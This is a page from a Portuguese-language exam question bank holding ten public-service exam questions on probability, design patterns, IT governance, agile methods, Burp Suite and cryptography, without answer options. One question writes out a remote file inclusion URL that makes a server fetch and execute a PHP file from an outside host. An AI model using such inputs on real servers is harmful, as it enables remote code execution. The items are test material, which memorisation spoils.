Magna Concursos

Foram encontradas 80 questões.

Considere um dado cúbico, com as faces numeradas de 1 a 6, e que cada face tem a mesma probabilidade de ficar voltada para cima quando o dado é lançado. Davi e Golias lançam esse dado uma vez cada um.

Sabendo que o número obtido no lançamento de Golias é um número par, a probabilidade de que Davi obtenha um número maior do que o de Golias é igual a

 

Provas

Questão presente nas seguintes provas

Um bom desenvolvedor de sistemas deve ter conhecimento sobre refatoração, padrões de arquitetura e de projeto, princípios SOLID e outros tópicos importantes sobre programação.

Em relação a padrões de projeto, considere o seguinte trecho de código:

public interface Heroi {

void falar();

}

public class HomemDeFerro implements Heroi {

public void falar() {

System.out.println("Eu sou o Homem de Ferro, da Marvel!");

}

}

public class SuperHomem implements Heroi {

public void falar() {

System.out.println("Eu sou o Super Homem, da DC!");

}

}

public class MarvelOuDC {

public static Heroi getHeroi(String nome) {

if (nome.equalsIgnoreCase("HomemDeFerro")) {

return new HomemDeFerro();

} else if (nome.equalsIgnoreCase("SuperHomem"))

{

return new SuperHomem();

}

}

}

Marque a opção que corresponde ao padrão de projeto implementado no código acima.

 

Provas

Questão presente nas seguintes provas

As grandezas \( X \), \( A \) e \( B \) são tais que \( X \) é diretamente proporcional a \( A \) e inversamente proporcional a \( B \).

Sabe-se que quando \( A \) = 12 e \( B \) = 30 tem-se \( X \) = 240.

Quando \( A \) = 15 e \( B \) = 36 o valor de \( X \) será

 

Provas

Questão presente nas seguintes provas

Os princípios de governança de TI envolvem a definição de processos e estruturas para garantir que a tecnologia da informação seja usada de forma eficiente, alinhada aos objetivos de negócios e à gestão adequada de riscos.

Com relação ao assunto analise as afirmativas a seguir:

I. O COBIT é um framework de governança de TI que foca no alinhamento de TI com os objetivos de negócios, garantindo a entrega de valor e a mitigação de riscos.

II. O ITIL é uma metodologia que descreve práticas de gerenciamento de serviços de TI, com ênfase na entrega eficiente e eficaz de serviços ao cliente, sem considerar a gestão de riscos.

III. O COBIT e o ITIL são frameworks complementares, ambos focados na governança de TI, sendo o COBIT mais voltado para o controle e o ITIL, para a gestão de serviços.

Está correto o que se afirma em

 

Provas

Questão presente nas seguintes provas

No contexto da gestão de serviços de TI, analise as afirmativas a seguir.

I. Em ambientes que seguem frameworks como ITIL, práticas de compliance devem ser tratadas separadamente dos processos de gerenciamento de serviços, para evitar atrasos nas auditorias internas e externas.

II. Auditorias de TI devem ser realizadas exclusivamente para verificar a conformidade com normas e regulamentações, sem impacto direto na melhoria dos processos de gerenciamento de incidentes e mudanças.

III. A realização de auditorias sistemáticas pode reduzir falhas de conformidade ao identificar e monitorar indicadores críticos em tempo real, permitindo ações corretivas alinhadas a padrões regulatórios.

Está correto o que se afirma em

 

Provas

Questão presente nas seguintes provas

As metodologias ágeis promovem flexibilidade, colaboração e entrega incremental, adaptando-se rapidamente às mudanças em diversos tipos de trabalho. Elas utilizam práticas para organizar tarefas, visualizar o fluxo de trabalho e garantir qualidade contínua.

Nesse sentido, correlacione as metodologias ágeis apresentadas a seguir com suas respectivas descrições.

1. Scrum

2. Kanban

3. XP(Extreme Programming)

( ) Método focado na gestão do fluxo contínuo de trabalho, utilizando um quadro visual para representar as etapas do trabalho, promovendo a visualização das tarefas em diferentes estágios e a limitação do trabalho em andamento.

( ) Metodologia que enfatiza a excelência técnica através da adoção de práticas específicas que visam a alta qualidade do processo de trabalho e do produto final, como revisões frequentes, feedback constante e foco na melhoria contínua do processo.

( ) Framework que define papéis e eventos específicos para a gestão do trabalho em equipe, estruturado em iterações curtas (sprints) com objetivos definidos, buscando entregas incrementais de valor e a adaptação contínua ao contexto, com foco na gestão do projeto como um todo.

Assinale a opção que indica a relação correta, na ordem apresentada.

 

Provas

Questão presente nas seguintes provas

No planejamento e ao controle de projetos, uma prática avançada para garantir o alinhamento entre a execução do projeto e os objetivos estratégicos da organização é

 

Provas

Questão presente nas seguintes provas

O Burp Suite é uma ferramenta amplamente utilizada para testes de segurança em aplicações web, oferecendo funcionalidades como interceptação de tráfego, análise de vulnerabilidades e automação de ataques.

Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.

I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.

II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.

III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.

Está correto o que se afirma em

 

Provas

Questão presente nas seguintes provas

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.

Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.

Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php

O teste foi realizado utilizando o seguinte endereço:

http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php

Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.

O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

 

Provas

Questão presente nas seguintes provas

Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.

Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que

 

Provas

Questão presente nas seguintes provas